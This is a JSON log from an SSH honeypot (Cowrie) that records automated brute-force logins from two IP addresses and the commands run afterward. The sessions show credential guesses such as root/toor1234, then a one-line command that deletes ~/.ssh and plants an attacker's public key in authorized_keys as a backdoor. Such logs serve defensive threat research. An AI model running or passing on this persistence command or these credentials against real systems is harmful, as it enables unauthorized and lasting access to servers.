{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:29.655821Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33977,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eaacfe86714","protocol":"ssh","message":"New connection: 212.227.235.229:33977 (1.2.3.4:22) [session: 8eaacfe86714]","sensor":"my-vps","timestamp":"2025-09-09T06:32:29.997146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:29.999157Z","src_ip":"212.227.235.229","session":"8eaacfe86714"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:30.338681Z","src_ip":"212.227.235.229","session":"8eaacfe86714"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:32:32.325150Z","src_ip":"212.227.235.229","session":"8eaacfe86714"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:33.756860Z","src_ip":"212.227.235.229","session":"8eaacfe86714"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35089,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fa6eb4e09de","protocol":"ssh","message":"New connection: 212.227.235.229:35089 (1.2.3.4:22) [session: 2fa6eb4e09de]","sensor":"my-vps","timestamp":"2025-09-09T06:32:34.127053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:34.139374Z","src_ip":"212.227.235.229","session":"2fa6eb4e09de"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:34.620956Z","src_ip":"212.227.235.229","session":"2fa6eb4e09de"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:32:36.158706Z","src_ip":"212.227.235.229","session":"2fa6eb4e09de"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:36.517356Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:36.519105Z","src_ip":"212.227.235.229","session":"2fa6eb4e09de"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":44890,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dc66abfc015","protocol":"ssh","message":"New connection: 157.20.207.165:44890 (1.2.3.4:22) [session: 9dc66abfc015]","sensor":"my-vps","timestamp":"2025-09-09T06:32:37.565927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:32:37.566697Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:32:37.750183Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.login.success","username":"root","password":"toor1234","message":"login attempt [root/toor1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:32:39.022457Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:32:39.458049Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:32:39.458844Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:32:39.460109Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:39.643852Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:32:40.025766Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:32:40.026422Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:32:40.212211Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:40.213148Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":44898,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6b78bb5c210","protocol":"ssh","message":"New connection: 157.20.207.165:44898 (1.2.3.4:22) [session: c6b78bb5c210]","sensor":"my-vps","timestamp":"2025-09-09T06:32:40.395578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:32:40.396321Z","src_ip":"157.20.207.165","session":"c6b78bb5c210"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:32:40.580116Z","src_ip":"157.20.207.165","session":"c6b78bb5c210"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:32:41.357159Z","src_ip":"157.20.207.165","session":"c6b78bb5c210"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:42.543370Z","src_ip":"157.20.207.165","session":"c6b78bb5c210"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":55024,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dbb891f455a","protocol":"ssh","message":"New connection: 157.20.207.165:55024 (1.2.3.4:22) [session: 1dbb891f455a]","sensor":"my-vps","timestamp":"2025-09-09T06:32:42.725995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:32:42.726803Z","src_ip":"157.20.207.165","session":"1dbb891f455a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:32:42.911844Z","src_ip":"157.20.207.165","session":"1dbb891f455a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:32:43.688124Z","src_ip":"157.20.207.165","session":"1dbb891f455a"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:43.872175Z","src_ip":"157.20.207.165","session":"9dc66abfc015"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:43.873400Z","src_ip":"157.20.207.165","session":"1dbb891f455a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37414,"dst_ip":"1.2.3.4","dst_port":22,"session":"51ad3023c035","protocol":"ssh","message":"New connection: 212.227.235.229:37414 (1.2.3.4:22) [session: 51ad3023c035]","sensor":"my-vps","timestamp":"2025-09-09T06:33:02.409574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:33:02.410840Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:33:02.677598Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.login.success","username":"root","password":"Qweasd123456","message":"login attempt [root/Qweasd123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:33:04.533947Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:33:05.149276Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:33:05.150024Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:33:05.151275Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:05.418470Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:33:05.974143Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:33:05.974885Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:33:06.242228Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:06.243262Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38264,"dst_ip":"1.2.3.4","dst_port":22,"session":"512588ce553e","protocol":"ssh","message":"New connection: 212.227.235.229:38264 (1.2.3.4:22) [session: 512588ce553e]","sensor":"my-vps","timestamp":"2025-09-09T06:33:06.539738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:33:06.541203Z","src_ip":"212.227.235.229","session":"512588ce553e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:33:06.835610Z","src_ip":"212.227.235.229","session":"512588ce553e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:33:07.985899Z","src_ip":"212.227.235.229","session":"512588ce553e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:09.274462Z","src_ip":"212.227.235.229","session":"512588ce553e"}
